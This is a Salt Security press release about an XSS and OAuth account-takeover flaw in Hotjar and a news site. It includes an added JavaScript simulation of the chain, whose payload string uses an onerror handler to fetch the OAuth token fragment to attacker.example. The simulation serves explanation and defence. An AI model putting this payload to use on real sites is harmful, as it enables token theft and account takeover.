Salt-Labs researchers uncover security issues that may have allowed attackers to leverage a vulnerability commonly believed to be obsolete.
PALO ALTO, Calif., July 29, 2024 /PRNewswire/ -- Salt Security, the leading API security company, today released new threat research from Salt-Labs highlighting critical security flaws in the popular web analytics provider Hotjar and a renowned global news outlet, underscoring elevated risk for enterprises. Hotjar is a
leading solution for product teams who want to go beyond
traditional web and product analytics so they can empathize with
and understand their users—to connect the dots between what's
happening and why it happens, so they can improve the user
experience (UX) and create customer delight. The company serves
over one million websites, including global brands. These
vulnerabilities could have allowed an attacker
unrestricted access to sensitive data held within these services,
affecting millions of users and organizations worldwide.
These findings are not specific to these two services; they point to
a broader issue that likely exists across similar ecosystems.
The resurrection of an age-old security issue
Cross-site scripting (commonly known as XSS) is a
security issue that has existed since the early days of the World
Wide Web. It has since been analyzed and mitigated at many layers
using countless techniques, to the point where it is often treated as a
well-understood, low-severity issue. However, the emergence of new
technologies can change an ecosystem substantially, which gives
attackers new opportunities to leverage historical flaws such
as XSS and escalate the resulting security risk significantly.
Recent Salt-Labs research demonstrates exactly this point,
notably by combining XSS with a more recently popularized technology,
OAuth. OAuth has become the de facto
authorization protocol of the past decade and, through OpenID Connect,
the basis of most third-party login. Organizations frequently depend on it
without realizing it: OAuth underpins thousands of
web services, as it plays a key role in any service that provides
'Social Login' functionality, among many others.
By combining OAuth features with the old XSS vulnerability,
Salt-Labs researchers have successfully proven the ability to take
over any account in Hotjar and the major news source's online
services.
To exploit this vulnerability, an attacker simply sends the
victim a valid link to the service they want to attack. The link
can be delivered over any channel (email, text message, social
media, an online forum post, and so on). Because the link points to
the legitimate service, the victim has practically no way to
recognize it as part of a larger attack without a deep technical
analysis. Once the victim clicks the link, the attacker gains
full control of the account, allowing them to perform any action
on the account and access any data stored in it.
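To make the mechanism concrete, the following is an added illustration written for this page; it is not code from Salt-Labs, Hotjar, or the news outlet, and it does not model either service's actual flaw. It shows the general shape of an XSS-plus-OAuth account takeover: a page on the client application's own origin reflects a query parameter into HTML without encoding, the identity provider accepts any redirect_uri on that host, and the single authorize link the victim clicks therefore lands the access token on the vulnerable page, where the injected script can read it. All hostnames, parameter names, the token value and the payload are constructed assumptions.

```javascript
// Added illustration, not Salt-Labs' or Hotjar's code. A minimal model of why a
// reflected XSS on an OAuth client's origin turns one "legitimate" link into
// account takeover, and the two controls that break the chain.
// Hosts, client_id, state, token and payload below are all constructed.

// Registered OAuth redirect URI for the client application (constructed).
const REGISTERED_REDIRECT = "https://app.example.com/oauth/callback";

// --- Authorization-server side: redirect_uri validation --------------------

// Weak check: only the host has to match, so any page on the client's origin,
// including one with an XSS bug, becomes a valid place for the token to land.
function isAllowedRedirectLoose(requested) {
  return new URL(requested).host === new URL(REGISTERED_REDIRECT).host;
}

// Strict check: simple string comparison against the registered value, as
// RFC 6749 section 3.1.2.3 requires.
function isAllowedRedirectStrict(requested) {
  return requested === REGISTERED_REDIRECT;
}

// --- Client-application side: a page that reflects a query parameter -------

function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) =>
    ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" }[c]));
}

// Vulnerable: unescaped reflection of ?msg= into markup.
function renderNoticeVulnerable(pageUrl) {
  const msg = new URL(pageUrl).searchParams.get("msg") ?? "";
  return `<p>Notice: ${msg}</p>`;
}

// Hardened: the same page with HTML output encoding applied.
function renderNoticeHardened(pageUrl) {
  const msg = new URL(pageUrl).searchParams.get("msg") ?? "";
  return `<p>Notice: ${escapeHtml(msg)}</p>`;
}

// Crude sink check used only for this demonstration: does the rendered HTML
// contain a script tag or an inline event handler that a browser would run?
function containsExecutableInjection(html) {
  return /<script[\s>]/i.test(html) || /<[^>]+\son\w+\s*=/i.test(html);
}

// --- The chain ---------------------------------------------------------------

// What the injected script does: read the token from location.hash and send
// it to the attacker. The fragment never reaches the server, so server logs
// and WAFs do not see the token leave.
const PAYLOAD =
  `<img src=x onerror="fetch('https://attacker.example/c?'+encodeURIComponent(location.hash))">`;

// Attacker-chosen redirect target: the vulnerable page on the victim's own origin.
const XSS_REDIRECT =
  "https://app.example.com/notice?msg=" + encodeURIComponent(PAYLOAD);

// The link the victim receives: a genuine authorize URL at the identity provider.
function buildAuthorizeLink(redirectUri) {
  const u = new URL("https://idp.example.com/oauth/authorize");
  u.search = new URLSearchParams({
    client_id: "app-client-id",
    response_type: "token",          // implicit flow: token returned in the fragment
    redirect_uri: redirectUri,
    scope: "profile",
    state: "abc123",
  }).toString();
  return u.toString();
}

// What the provider does after the victim consents: append the token to the
// fragment of whatever redirect_uri passed validation.
function providerRedirect(redirectUri, validator) {
  if (!validator(redirectUri)) return null; // request rejected outright
  return redirectUri + "#access_token=tok_victim_123&token_type=bearer";
}

// Run the chain with a given redirect validator and page renderer and report
// where, if anywhere, it was stopped.
function simulate(validator, renderer) {
  const landing = providerRedirect(XSS_REDIRECT, validator);
  if (landing === null) return { blockedAt: "redirect_uri", tokenExposed: false };
  const html = renderer(landing);
  const tokenInFragment =
    new URLSearchParams(new URL(landing).hash.slice(1)).get("access_token");
  const exploitable = containsExecutableInjection(html) && tokenInFragment !== null;
  return { blockedAt: exploitable ? null : "output_encoding", tokenExposed: exploitable };
}

console.log("victim clicks:", buildAuthorizeLink(XSS_REDIRECT));
console.log("loose redirect + vulnerable page:", simulate(isAllowedRedirectLoose, renderNoticeVulnerable));
console.log("strict redirect + vulnerable page:", simulate(isAllowedRedirectStrict, renderNoticeVulnerable));
console.log("loose redirect + hardened page:  ", simulate(isAllowedRedirectLoose, renderNoticeHardened));
```

Two things are worth noting from the model. First, the token is exposed only when both weaknesses line up, so either control alone breaks this particular chain; but an XSS on the client's origin still lets injected script act as the logged-in user through same-origin requests, so output encoding (and a Content Security Policy) is the control that matters, with strict redirect_uri matching and the authorization code flow with PKCE as defense in depth. Second, the link the victim clicks really is the identity provider's own authorize URL, which is why ordinary "check the domain" advice does not help here.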
A widespread issue
While Salt-Labs's research focused
on two "example" targets, Hotjar and the major news source, the
issue is not confined to them. Given the popularity of OAuth
and how common XSS flaws remain, the same issue likely
exists in numerous other web services, showcasing the risks that
accompany combining third-party APIs and authorization flows.
We recommend that security teams read through the technical
details and detailed explanations listed in our blog post to
better understand the potential exposure of their online services.
We also recommend that users exercise caution when clicking on
unknown links, even those sent from trusted sources.
The Salt-Labs team has also released a tool that
helps companies assess their exposure to similar vulnerabilities,
with the goal of reducing their risk profile. Until now, this tool
was used internally by Salt-Labs to identify risks and
vulnerabilities. If you are a domain/website owner and interested
in assessing your risk, please click here to complete your free
scan.
Our ongoing research continues to surface further dimensions of the
risks tied up in API usage, specifically around
widely used OAuth integrations. At the beginning of 2024, we highlighted
these risks when we revealed critical OAuth vulnerabilities in the
popular AI tool ChatGPT.
About Salt Security
As the pioneer of the API security market, Salt Security protects
the APIs that form the core of every modern application. Protecting
some of the largest enterprises in the world, Salt's API Protection
Platform is the only API security solution that combines the power
of cloud-scale big data and time-tested ML/AI to detect and prevent
API attacks. With its patented approach to blocking today's
low-and-slow API attacks, only Salt provides the adaptive
intelligence needed to protect APIs. Salt's posture governance
engine also delivers operationalized API governance and threat
detection across organizations at scale. Unlike other API
governance solutions, Salt Security's AI-based runtime engine pulls
from the largest data lake in order to continuously train the
engine. Salt supports organizations through the entire API journey
from discovery, to posture governance and threat protection.
Deployed quickly and seamlessly integrated within existing systems,
the Salt platform gives customers immediate value and protection,
so they can innovate with confidence and accelerate their digital
transformation initiatives. For more information,
visit: https://salt.security/.
Media Contact
Sena McGrand
Lumina Communications for Salt Security
salt@luminapr.com
View original content to download multimedia: https://www.prnewswire.com/news-releases/salt-security-discovers-security-flaws-in-hotjar-potentially-affecting-sensitive-data-of-millions-utilizing-major-global-brands---issues-have-been-remediated-302208168.html
SOURCE Salt Security